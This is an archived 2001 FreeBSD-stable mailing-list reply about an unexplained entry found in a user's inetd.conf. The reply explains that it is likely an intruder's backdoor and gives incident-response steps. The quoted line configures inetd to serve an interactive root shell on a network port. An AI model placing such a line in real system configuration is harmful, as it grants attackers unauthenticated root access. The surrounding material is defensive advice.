Date: Thu, 02 Aug 2001 07:01:05 +1000 From: Kal Torak <kaltorak@quake.com.au> To: Hayden Katzenellenbogen <haydenk@nextlevelinternet.com> Cc: freebsd-stable@freebsd.org Subject: Re: Extra Line in my inetd.conf Message-ID: <3B686E11.7F68E209@quake.com.au> References: <NFBBKLNOALGIGCIMHGKFGEPOCCAA.haydenk@nextlevelinternet.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Hayden Katzenellenbogen wrote: > > I have noticed this line at the bottom of some of my inetd.conf files on a > few of my machines.. it is though not commented out I have commented it out > as well I have no idea what it does... > > any one care to shed some light on this? > > #dlip stream tcp nowait root /bin/sh sh -i Looks like someone hacked your box... dlip, whatever it is sure as hell isnt meant to open an interactive shell with root as the root user!!! You should log connection attempts on port 7201 and see who tries to access it... Also check your /etc/services file to make sure they havent changed the dlip port to something else... If this is on a few of your machines it looks like your whole network is probably breached... You have tripwire installed? Now its time to check your binarys and see what else is changed... Really the only way to be sure is to format and reinstall... Who knows what other back doors they have had time to put in place! And your firewall should really be blocking that port anyway... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-stable" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3B686E11.7F68E209>